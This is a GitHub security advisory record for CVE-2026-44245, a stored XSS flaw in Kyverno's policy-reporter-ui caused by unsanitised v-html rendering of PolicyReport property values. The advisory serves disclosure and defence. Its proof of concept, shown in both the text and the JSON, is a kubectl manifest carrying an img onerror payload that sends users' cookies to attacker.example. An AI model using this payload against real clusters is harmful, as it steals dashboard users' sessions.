GHSA-Q98M-7W8C-W388

Vulnerability from github – Published: 2026-05-06 22:11 – Updated: 2026-05-13 16:43
VLAI?
Summary
Kyverno policy-reporter-ui has XSS via Stored Property Values in PropertyCard Component
Details

Summary

Vue 3's v-html directive is the framework-documented mechanism for injecting raw HTML, and it intentionally disables the auto-escaping that {{ }} interpolation provides. The PropertyCard.vue component uses v-html for the else branch of the URL check, meaning any non-URL string value flows directly into the DOM as HTML. The isURL() guard only filters values that parse as http: or https: URLs, so any HTML payload not starting with those schemes (e.g., <img src=x onerror=alert(1)> padded to exceed 75 chars) bypasses it entirely. The data originates from Kubernetes PolicyReport .results[].properties fields, which are arbitrary string maps populated by policy engines and potentially by any principal with write access to PolicyReport objects in the cluster. No DOMPurify or equivalent HTML sanitization library is present anywhere in the frontend codebase, confirming there is no compensating control between the API response and the sink.

This vulnerability was reproduced on the latest policy reporter UI version – 2.5.1.

PoC

Prerequisites: Kubernetes write access to PolicyReport resources in the target cluster (e.g., via a policy engine service account or direct kubectl access)

Create a Kubernetes PolicyReport resource with a crafted property value longer than 75 characters. When an authenticated Policy Reporter UI user browses to the affected namespace and expands the result row containing this property, the injected script executes in their browser.

kubectl apply -f - <<'EOF'
apiVersion: [wgpolicyk8s.io/v1alpha2](http://wgpolicyk8s.io/v1alpha2)
kind: PolicyReport
metadata:
  name: xss-poc
  namespace: default
results:
- message: "test"
  policy: xss-test-policy
  rule: check-rule
  result: fail
  properties:
    # Value > 75 chars and not an http/https URL -> routed to v-html sink
    advisory: "<img src=x onerror=\"fetch('[https://attacker.example/c?c='+document.cookie](https://attacker.example/c?c=%27+document.cookie))\"> padding padding padding"
EOF
# Once a UI user opens the results table for the 'default' namespace
# and expands the 'xss-test-policy' result row, the onerror handler fires
# and exfiltrates their session cookies to attacker.example

Снимок экрана — 2026-04-21 в 10 52 17 Снимок экрана — 2026-04-21 в 10 51 44

Impact

XSS

Severity ?
6.1 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.5.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/kyverno/policy-reporter-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44245"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T22:11:14Z",
    "nvd_published_at": "2026-05-12T23:16:18Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nVue 3\u0027s v-html directive is the framework-documented mechanism for injecting raw HTML, and it intentionally disables the auto-escaping that {{ }} interpolation provides. The PropertyCard.vue component uses v-html for the else branch of the URL check, meaning any non-URL string value flows directly into the DOM as HTML. The isURL() guard only filters values that parse as http: or https: URLs, so any HTML payload not starting with those schemes (e.g., `\u003cimg src=x onerror=alert(1)\u003e` padded to exceed 75 chars) bypasses it entirely. The data originates from Kubernetes PolicyReport .results[].properties fields, which are arbitrary string maps populated by policy engines and potentially by any principal with write access to PolicyReport objects in the cluster. No DOMPurify or equivalent HTML sanitization library is present anywhere in the frontend codebase, confirming there is no compensating control between the API response and the sink.\n\nThis vulnerability was reproduced on the latest policy reporter UI version \u2013 2.5.1.\n\n\n### PoC\n\nPrerequisites: Kubernetes write access to PolicyReport resources in the target cluster (e.g., via a policy engine service account or direct kubectl access)\n\nCreate a Kubernetes PolicyReport resource with a crafted property value longer than 75 characters. When an authenticated Policy Reporter UI user browses to the affected namespace and expands the result row containing this property, the injected script executes in their browser.\n```bash\nkubectl apply -f - \u003c\u003c\u0027EOF\u0027\napiVersion: [wgpolicyk8s.io/v1alpha2](http://wgpolicyk8s.io/v1alpha2)\nkind: PolicyReport\nmetadata:\n  name: xss-poc\n  namespace: default\nresults:\n- message: \"test\"\n  policy: xss-test-policy\n  rule: check-rule\n  result: fail\n  properties:\n    # Value \u003e 75 chars and not an http/https URL -\u003e routed to v-html sink\n    advisory: \"\u003cimg src=x onerror=\\\"fetch(\u0027[https://attacker.example/c?c=\u0027+document.cookie](https://attacker.example/c?c=%27+document.cookie))\\\"\u003e padding padding padding\"\nEOF\n# Once a UI user opens the results table for the \u0027default\u0027 namespace\n# and expands the \u0027xss-test-policy\u0027 result row, the onerror handler fires\n# and exfiltrates their session cookies to attacker.example\n```\n\u003cimg width=\"1562\" height=\"1061\" alt=\"\u0421\u043d\u0438\u043c\u043e\u043a \u044d\u043a\u0440\u0430\u043d\u0430\u00a0\u2014 2026-04-21 \u0432\u00a010 52 17\" src=\"https://github.com/user-attachments/assets/fe542ccb-1662-44cb-802f-7998aa145db7\" /\u003e\n\u003cimg width=\"1041\" height=\"939\" alt=\"\u0421\u043d\u0438\u043c\u043e\u043a \u044d\u043a\u0440\u0430\u043d\u0430\u00a0\u2014 2026-04-21 \u0432\u00a010 51 44\" src=\"https://github.com/user-attachments/assets/bc07cf20-aea5-4a90-838f-c428d88a92b7\" /\u003e\n\n### Impact\nXSS",
  "id": "GHSA-q98m-7w8c-w388",
  "modified": "2026-05-13T16:43:41Z",
  "published": "2026-05-06T22:11:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-q98m-7w8c-w388"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44245"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kyverno/kyverno"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Kyverno policy-reporter-ui has XSS via Stored Property Values in PropertyCard Component"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.